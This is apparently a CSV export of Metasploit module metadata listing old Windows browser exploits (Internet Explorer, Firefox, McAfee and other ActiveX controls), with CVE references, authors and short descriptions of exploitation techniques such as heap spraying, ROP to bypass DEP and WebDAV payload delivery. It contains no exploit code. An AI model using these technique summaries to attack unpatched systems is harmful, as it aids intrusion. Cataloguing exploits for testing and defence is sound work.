Please note this module only works against specific versions of XCS. Currently, we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.","Metasploit Framework License (BSD)","f","2012-11-26 00:00:00",0,,"passive","t","URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html","Roberto Suggi Liverani, juan vazquez , sinn3r " 446,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb","exploit","windows/browser/mcafee_mcsubmgr_vsprintf","exploit/windows/browser/mcafee_mcsubmgr_vsprintf","McAfee Subscription Manager Stack Buffer Overflow",300,"This module exploits a flaw in the McAfee Subscription Manager ActiveX control. Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by passing a large string to one of the COM-exposed routines, such as IsAppExpired. This vulnerability was discovered by Karl Lynn of eEye.","Metasploit Framework License (BSD)","f","2006-08-01 00:00:00",0,,"passive","t","BID-19265, CVE-2006-3961, OSVDB-27698, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html","skape " 447,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mcafee_mvt_exec.rb","exploit","windows/browser/mcafee_mvt_exec","exploit/windows/browser/mcafee_mvt_exec","McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability",600,"This module exploits a vulnerability found in McAfee Virtual Technician's MVTControl. 
This ActiveX control can be abused by using the GetObject() function to load additional unsafe classes such as WScript.Shell, therefore allowing remote code execution under the context of the user.","Metasploit Framework License (BSD)","f","2012-04-30 00:00:00",0,,"passive","t","EDB-18805, OSVDB-81657, URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028","rgod, sinn3r " 448,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb","exploit","windows/browser/mcafeevisualtrace_tracetarget","exploit/windows/browser/mcafeevisualtrace_tracetarget","McAfee Visual Trace ActiveX Control Buffer Overflow",300,"This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX Control (NeoTraceExplorer.dll 1.0.0.1). By sending an overly long string to the ""TraceTarget()"" method, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-07-07 00:00:00",0,,"passive","t","CVE-2006-6707, OSVDB-32399, URL-http://secunia.com/advisories/23463","MC " 449,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mirc_irc_url.rb","exploit","windows/browser/mirc_irc_url","exploit/windows/browser/mirc_irc_url","mIRC IRC URL Buffer Overflow",300,"This module exploits a stack buffer overflow in mIRC 6.1. 
By submitting an overly long and specially crafted URL to the 'irc' protocol, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","f","2003-10-13 00:00:00",0,,"passive","t","BID-8819, CVE-2003-1336, OSVDB-2665","MC " 450,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_attribchildremoved.rb","exploit","windows/browser/mozilla_attribchildremoved","exploit/windows/browser/mozilla_attribchildremoved","Firefox 8/9 AttributeChildRemoved() Use-After-Free",200,"This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1. Removal of child nodes from the nsDOMAttribute can allow for a child to still be accessible after removal due to a premature notification of AttributeChildRemoved. Since mFirstChild is not set to NULL until after this call is made, this means the removed child will be accessible after it has been removed. By carefully manipulating the memory layout, this can lead to arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-12-06 00:00:00",0,,"passive","t","CVE-2011-3659, OSVDB-78736, URL-http://www.zerodayinitiative.com/advisories/upcoming/, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198","Lincoln , corelanc0d3r , regenrecht" 451,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_interleaved_write.rb","exploit","windows/browser/mozilla_interleaved_write","exploit/windows/browser/mozilla_interleaved_write","Mozilla Firefox Interleaved document.write/appendChild Memory Corruption",300,"This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. 
This module was written based on a live exploit found in the wild.","Metasploit Framework License (BSD)","f","2010-10-25 00:00:00",0,,"passive","t","BID-15352, CVE-2010-3765, EDB-15352, OSVDB-68905, URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222","scriptjunkie, unknown" 452,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_mchannel.rb","exploit","windows/browser/mozilla_mchannel","exploit/windows/browser/mozilla_mchannel","Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability",300,"This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECT's data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3. Additionally, a Windows 7 target was provided using Java 6 and below to avoid ASLR.","Metasploit Framework License (BSD)","f","2011-05-10 00:00:00",0,,"passive","t","CVE-2011-0065, OSVDB-72085, URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=634986","Rh0, mr_me , regenrecht" 453,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_nssvgvalue.rb","exploit","windows/browser/mozilla_nssvgvalue","exploit/windows/browser/mozilla_nssvgvalue","Firefox 7/8 (<= 8.0.1) nsSVGValue Out-of-Bounds Access Vulnerability",200,"This module exploits an out-of-bounds access flaw in Firefox 7 and 8 (<= 8.0.1). The notification of nsSVGValue observers via nsSVGValue::NotifyObservers(x,y) uses a loop which can result in an out-of-bounds access to attacker-controlled memory. The mObserver ElementAt() function (which picks up pointers) does not validate if a given index is out of bounds. 
If a custom observer of nsSVGValue is created, which removes elements from the original observer, and memory layout is manipulated properly, the ElementAt() function might pick up an attacker provided pointer, which can be leveraged to gain remote arbitrary code execution.","Metasploit Framework License (BSD)","f","2011-12-06 00:00:00",0,,"passive","t","CVE-2011-3658, OSVDB-77953, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-056/, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708186","Lincoln , corelanc0d3r , regenrecht" 454,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_nstreerange.rb","exploit","windows/browser/mozilla_nstreerange","exploit/windows/browser/mozilla_nstreerange","Mozilla Firefox ""nsTreeRange"" Dangling Pointer Vulnerability",300,"This module exploits a code execution vulnerability in Mozilla Firefox 3.6.x <= 3.6.16 and 3.5.x <= 3.5.17 found in nsTreeSelection. By overwriting a subfunction of invalidateSelection it is possible to free the nsTreeRange object that the function currently operates on. Any further operations on the freed object can result in remote code execution. Utilizing the call setup the function provides it's possible to bypass DEP without the need for a ROP. 
Sadly this exploit is still either dependent on Java or bound by ASLR because Firefox doesn't employ any ASLR-free modules anymore.","Metasploit Framework License (BSD)","f","2011-02-02 00:00:00",0,,"passive","t","BID-47663, CVE-2011-0073, OSVDB-72087, URL-http://www.mozilla.org/security/announce/2011/mfsa2011-13.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-157/, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=630919","regenrecht, xero" 455,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/mozilla_reduceright.rb","exploit","windows/browser/mozilla_reduceright","exploit/windows/browser/mozilla_reduceright","Mozilla Firefox Array.reduceRight() Integer Overflow",300,"This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index to be used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compared to a typical browser exploit) in order to gain control of the machine.","Metasploit Framework License (BSD)","f","2011-06-21 00:00:00",0,,"passive","t","CVE-2011-2371, EDB-17974, URL-https://bugzilla.mozilla.org/show_bug.cgi?id=664009","Chris Rohlf, Matteo Memelli, TecR0c , Yan Ivnitskiy, dookie2000ca, mr_me , sinn3r " 456,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb","exploit","windows/browser/ms03_020_ie_objecttype","exploit/windows/browser/ms03_020_ie_objecttype","MS03-020 Internet Explorer Object Type",300,"This module exploits a vulnerability in Internet Explorer's handling of the OBJECT type attribute.","Metasploit Framework License (BSD)","f","2003-06-04 00:00:00",0,,"passive","t","BID-7806, CVE-2003-0344, MSB-MS03-020, OSVDB-2967","skape " 457,"2013-05-07 
00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms05_054_onload.rb","exploit","windows/browser/ms05_054_onload","exploit/windows/browser/ms05_054_onload","MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",300,"This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation.","Metasploit Framework License (BSD)","f","2005-11-21 00:00:00",0,,"passive","t","BID-13799, CVE-2005-1790, MSB-MS05-054, OSVDB-17094, URL-http://www.cvedetails.com/cve/CVE-2005-1790","Benjamin Tobias Franz, Sam Sharps, Stuart Pearson" 458,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb","exploit","windows/browser/ms06_001_wmf_setabortproc","exploit/windows/browser/ms06_001_wmf_setabortproc","Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",500,"This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. 
This module generates a random WMF record stream for each request.","Metasploit Framework License (BSD)","f","2005-12-27 00:00:00",0,,"passive","t","BID-16074, CVE-2005-4560, MSB-MS06-001, OSVDB-21987, URL-http://wvware.sourceforge.net/caolan/ora-wmf.html, URL-http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt, URL-http://www.microsoft.com/technet/security/advisory/912840.mspx","O600KO78RUS , hdm , san " 459,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_013_createtextrange.rb","exploit","windows/browser/ms06_013_createtextrange","exploit/windows/browser/ms06_013_createtextrange","Internet Explorer createTextRange() Code Execution",300,"This module exploits a code execution vulnerability in Microsoft Internet Explorer. Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point to a very remote, non-existent memory location. This module is the result of merging three different exploit submissions and has only been reliably tested against Windows XP SP2. This vulnerability was independently discovered by multiple parties. 
The heap spray method used by this exploit was pioneered by Skylined.","Metasploit Framework License (BSD)","f","2006-03-19 00:00:00",0,,"passive","t","BID-17196, CVE-2006-1359, MSB-MS06-013, OSVDB-24050, URL-http://seclists.org/lists/bugtraq/2006/Mar/0410.html, URL-http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html, URL-http://secunia.com/secunia_research/2006-7/advisory/, URL-http://www.shog9.com/crashIE.html, US-CERT-VU-876678","Darkeagle , Faithless , Unknown, hdm , justfriends4n0w " 460,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_055_vml_method.rb","exploit","windows/browser/ms06_055_vml_method","exploit/windows/browser/ms06_055_vml_method","Internet Explorer VML Fill Method Code Execution",300,"This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.","Metasploit Framework License (BSD)","f","2006-09-19 00:00:00",0,,"passive","t","BID-20096, CVE-2006-4868, MSB-MS06-055, OSVDB-28946","Aviv Raff , M. Shirk , Mr.Niega , Trirat Puttaraksa (Kira) , hdm " 461,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_057_webview_setslice.rb","exploit","windows/browser/ms06_057_webview_setslice","exploit/windows/browser/ms06_057_webview_setslice","Internet Explorer WebViewFolderIcon setSlice() Overflow",300,"This module exploits a flaw in the WebViewFolderIcon ActiveX control included with Windows 2000, Windows XP, and Windows 2003. 
This flaw was published during the Month of Browser Bugs project (MoBB #18).","Metasploit Framework License (BSD)","f","2006-07-17 00:00:00",0,,"passive","t","BID-19030, CVE-2006-3730, MSB-MS06-057, OSVDB-27110, URL-http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html","hdm " 462,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_067_keyframe.rb","exploit","windows/browser/ms06_067_keyframe","exploit/windows/browser/ms06_067_keyframe","Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",300,"This module exploits a heap overflow vulnerability in the KeyFrame method of the direct animation ActiveX control. This is a port of the exploit implemented by Alexander Sotirov.","Metasploit Framework License (BSD)","f","2006-11-14 00:00:00",0,,"passive","t","BID-20047, CVE-2006-4777, MSB-MS06-067, OSVDB-28842, URL-https://www.blackhat.com/presentations/bh-eu-07/Sotirov/Sotirov-Source-Code.zip","Alexander Sotirov , skape " 463,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms06_071_xml_core.rb","exploit","windows/browser/ms06_071_xml_core","exploit/windows/browser/ms06_071_xml_core","Internet Explorer XML Core Services HTTP Request Handling",300,"This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. 
This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2.","Metasploit Framework License (BSD)","f","2006-10-10 00:00:00",0,,"passive","t","BID-20915, CVE-2006-5745, MSB-MS06-071, OSVDB-29425","Trirat Puttaraksa " 464,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb","exploit","windows/browser/ms07_017_ani_loadimage_chunksize","exploit/windows/browser/ms07_017_ani_loadimage_chunksize","Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",500,"This module exploits a buffer overflow vulnerability in the LoadAniIcon() function in USER32.dll. The flaw can be triggered through Internet Explorer 6 and 7 by using the CURSOR style sheet directive to load a malicious .ANI file. The module can also exploit Mozilla Firefox by using a UNC path in a moz-icon URL and serving the .ANI file over WebDAV. The vulnerable code in USER32.dll will catch any exceptions that occur while the invalid cursor is loaded, causing the exploit to silently fail when the wrong target has been chosen. 
This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.","Metasploit Framework License (BSD)","f","2007-03-28 00:00:00",0,,"passive","t","BID-23194, CVE-2007-0038, MSB-MS07-017, OSVDB-33629, URL-http://www.determina.com/security.research/vulnerabilities/ani-header.html, URL-http://www.microsoft.com/technet/security/advisory/935423.mspx","Solar Eclipse , hdm , skape " 465,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb","exploit","windows/browser/ms08_041_snapshotviewer","exploit/windows/browser/ms08_041_snapshotviewer","Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",600,"This module allows remote attackers to place arbitrary files on a user's file system via the Microsoft Office Snapshot Viewer ActiveX Control.","Metasploit Framework License (BSD)","f","2008-07-07 00:00:00",0,,"passive","t","BID-30114, CVE-2008-2463, MSB-MS08-041, OSVDB-46749","MC " 466,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_053_mediaencoder.rb","exploit","windows/browser/ms08_053_mediaencoder","exploit/windows/browser/ms08_053_mediaencoder","Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",300,"This module exploits a stack buffer overflow in Windows Media Encoder 9. 
When sending an overly long string to the GetDetailsString() method of wmex.dll an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-09-09 00:00:00",0,,"passive","t","BID-31065, CVE-2008-3008, MSB-MS08-053, OSVDB-47962","MC " 467,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb","exploit","windows/browser/ms08_070_visual_studio_msmask","exploit/windows/browser/ms08_070_visual_studio_msmask","Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow",300,"This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Mdmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2008-08-13 00:00:00",0,,"passive","t","BID-30674, CVE-2008-3704, MSB-MS08-070, OSVDB-47475","MC , koshi" 468,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms08_078_xml_corruption.rb","exploit","windows/browser/ms08_078_xml_corruption","exploit/windows/browser/ms08_078_xml_corruption","Internet Explorer Data Binding Memory Corruption",300,"This module exploits a vulnerability in the data binding feature of Internet Explorer. In order to execute code reliably, this module uses the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is used to create a fake vtable at a known location with all methods pointing to our payload. 
Since the .text segment of the .NET DLL is non-writable, a prefixed code stub is used to copy the payload into a new memory segment and continue execution from there.","Metasploit Framework License (BSD)","f","2008-12-07 00:00:00",0,,"passive","t","BID-32721, CVE-2008-4844, MSB-MS08-078, OSVDB-50622, URL-http://taossa.com/archive/bh08sotirovdowd.pdf, URL-http://www.microsoft.com/technet/security/advisory/961051.mspx","hdm " 469,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_002_memory_corruption.rb","exploit","windows/browser/ms09_002_memory_corruption","exploit/windows/browser/ms09_002_memory_corruption","Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption",300,"This module exploits an error related to the CFunctionPointer function when attempting to access uninitialized memory. A remote attacker could exploit this vulnerability to corrupt memory and execute arbitrary code on the system with the privileges of the victim.","Metasploit Framework License (BSD)","f","2009-02-10 00:00:00",0,,"passive","t","CVE-2009-0075, MSB-MS09-002, OSVDB-51839","dean " 470,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb","exploit","windows/browser/ms09_043_owc_htmlurl","exploit/windows/browser/ms09_043_owc_htmlurl","Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",300,"This module exploits a buffer overflow in Microsoft's Office Web Components. 
When passing an overly long string as the ""HTMLURL"" parameter an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","f","2009-08-11 00:00:00",1,,"passive","t","BID-35992, CVE-2009-1534, MSB-MS09-043, OSVDB-56916, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=819","jduck " 471,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_043_owc_msdso.rb","exploit","windows/browser/ms09_043_owc_msdso","exploit/windows/browser/ms09_043_owc_msdso","Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption",300,"This module exploits a memory corruption vulnerability within versions 10 and 11 of the Office Web Component Spreadsheet ActiveX control. This module was based on an exploit found in the wild.","Metasploit Framework License (BSD)","f","2009-07-13 00:00:00",0,,"passive","t","CVE-2009-1136, EDB-9163, MSB-MS09-043, OSVDB-55806, URL-http://ahmed.obied.net/software/code/exploits/ie_owc.py, URL-http://www.microsoft.com/technet/security/advisory/973472.mspx","Ahmed Obied, DSR! 
, hdm , unknown" 472,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms09_072_style_object.rb","exploit","windows/browser/ms09_072_style_object","exploit/windows/browser/ms09_072_style_object","Internet Explorer Style getElementsByTagName Memory Corruption",300,"This module exploits a vulnerability in the getElementsByTagName function as implemented within Internet Explorer.","Metasploit Framework License (BSD)","f","2009-11-20 00:00:00",0,,"passive","t","BID-37085, CVE-2009-3672, MSB-MS09-072, OSVDB-50622, URL-http://taossa.com/archive/bh08sotirovdowd.pdf, URL-http://www.microsoft.com/technet/security/advisory/977981.mspx","jduck , securitylab.ir " 473,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_002_aurora.rb","exploit","windows/browser/ms10_002_aurora","exploit/windows/browser/ms10_002_aurora","Internet Explorer ""Aurora"" Memory Corruption",300,"This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the ""Operation Aurora"" attacks that led to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. 
The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.","Metasploit Framework License (BSD)","f","2010-01-14 00:00:00",0,,"passive","t","CVE-2010-0249, MSB-MS10-002, OSVDB-61697, URL-http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js, URL-http://www.microsoft.com/technet/security/advisory/979352.mspx","hdm , unknown" 474,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_002_ie_object.rb","exploit","windows/browser/ms10_002_ie_object","exploit/windows/browser/ms10_002_ie_object","MS10-002 Internet Explorer Object Memory Use-After-Free",300,"This module exploits a vulnerability found in Internet Explorer's mshtml component. Due to the way IE handles objects in memory, it is possible to cause a pointer in CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed, therefore allowing remote code execution under the context of the user. This particular vulnerability was also one of 2012's Pwn2Own challenges, and was later explained by Peter Vreugdenhil with exploitation details. 
Instead of Peter's method, this module uses heap spraying like the 99% to store a specially crafted memory layout before re-using the freed memory.","Metasploit Framework License (BSD)","f","2010-01-21 00:00:00",0,,"passive","t","CVE-2010-0248, MSB-MS10-002, OSVDB-61914, URL-http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-014/","Peter Vreugdenhil, juan vazquez , sinn3r " 475,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb","exploit","windows/browser/ms10_018_ie_behaviors","exploit/windows/browser/ms10_018_ie_behaviors","Internet Explorer DHTML Behaviors Use After Free",400,"This module exploits a use-after-free vulnerability within the DHTML behaviors functionality of Microsoft Internet Explorer versions 6 and 7. This bug was discovered being used in-the-wild and was previously known as the ""iepeers"" vulnerability. The name comes from Microsoft's suggested workaround to block access to the iepeers.dll file. According to Nico Waisman, ""The bug itself is when trying to persist an object using the setAttribute, which end up calling VariantChangeTypeEx with both the source and the destination being the same variant. So if you send as a variant an IDISPATCH the algorithm will try to do a VariantClear of the destination before using it. 
This will end up on a call to PlainRelease which deref the reference and clean the object."" NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.","Metasploit Framework License (BSD)","f","2010-03-09 00:00:00",0,,"passive","t","BID-38615, CVE-2010-0806, MSB-MS10-018, OSVDB-62810, URL-http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html, URL-http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/, URL-http://www.microsoft.com/technet/security/advisory/981374.mspx","Nanika, Trancer , jduck , unknown" 476,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb","exploit","windows/browser/ms10_018_ie_tabular_activex","exploit/windows/browser/ms10_018_ie_tabular_activex","Internet Explorer Tabular Data Control ActiveX Memory Corruption",400,"This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the ""DataURL"" parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code.","Metasploit Framework License (BSD)","f","2010-03-09 00:00:00",0,,"passive","t","BID-39025, CVE-2010-0805, MSB-MS10-018, OSVDB-63329, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-034","Unknown, jduck " 477,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb","exploit","windows/browser/ms10_022_ie_vbscript_winhlp32","exploit/windows/browser/ms10_022_ie_vbscript_winhlp32","Internet Explorer Winhlp32.exe MsgBox Code Execution",500,"This module exploits a code execution vulnerability that occurs when a user presses F1 on MessageBox originated from VBscript within a web page. 
When the user hits F1, the MessageBox help functionality will attempt to load and use an HLP file from an SMB or WebDAV server (the latter only if the WebDAV redirector is enabled). This particular version of the exploit implements a WebDAV server that serves the HLP file as well as a payload EXE. During testing, warnings about the payload EXE being unsigned were observed. A future version of this module might use other methods that do not create such a warning.","Metasploit Framework License (BSD)","f","2010-02-26 00:00:00",0,,"passive","t","CVE-2010-0483, MSB-MS10-023, OSVDB-62632, URL-http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx, URL-http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt, URL-http://www.microsoft.com/technet/security/advisory/981169.mspx","Maurycy Prodeus, jduck " 478,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb","exploit","windows/browser/ms10_026_avi_nsamplespersec","exploit/windows/browser/ms10_026_avi_nsamplespersec","MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",300,"This module exploits a buffer overflow in l3codecx.ax while processing AVI files with MPEG Layer-3 audio contents. The overflow only allows overwriting with zeros, so the three least significant bytes of the EIP saved on the stack are overwritten, and the shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. 
Please note that on IE 8 targets, the malicious URL must be a trusted site in order to load the .NET control.","Metasploit Framework License (BSD)","f","2010-04-13 00:00:00",0,,"passive","t","BID-39303, CVE-2010-0480, MSB-MS10-026, OSVDB-63749, URL-http://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/, URL-http://www.phreedom.org/research/bypassing-browser-memory-protections/","Jordi Sanchez , Shahin Ramezany , Yamata Li, juan vazquez " 479,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb","exploit","windows/browser/ms10_042_helpctr_xss_cmd_exec","exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec","Microsoft Help Center XSS and Command Execution",600,"Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme ""hcp"". Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. With IE8 and WMP11, either can be used to launch the attack, but both pop up dialog boxes asking the user whether execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to ""none"" or ""player"". 
This module creates a WebDAV service from which the payload is copied to the victim machine.","Metasploit Framework License (BSD)","f","2010-06-09 00:00:00",0,,"passive","t","CVE-2010-1885, MSB-MS10-042, OSVDB-65264, URL-http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY, URL-http://www.microsoft.com/technet/security/advisory/2219475.mspx","Tavis Ormandy, natron " 480,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb","exploit","windows/browser/ms10_046_shortcut_icon_dllloader","exploit/windows/browser/ms10_046_shortcut_icon_dllloader","Microsoft Windows Shell LNK Code Execution",600,"This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.","Metasploit Framework License (BSD)","f","2010-07-16 00:00:00",0,,"passive","t","CVE-2010-2568, MSB-MS10-046, OSVDB-66387, URL-http://www.microsoft.com/technet/security/advisory/2286198.mspx","B_H, hdm , jduck " 481,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb","exploit","windows/browser/ms10_090_ie_css_clip","exploit/windows/browser/ms10_090_ie_css_clip","Internet Explorer CSS SetUserClip Memory Corruption",400,"This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead to arbitrary code execution. It seems that Microsoft's code inadvertently increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address ""[vtable+0x30+1]"". The particular address depends on the exact version of the mshtml library in use. 
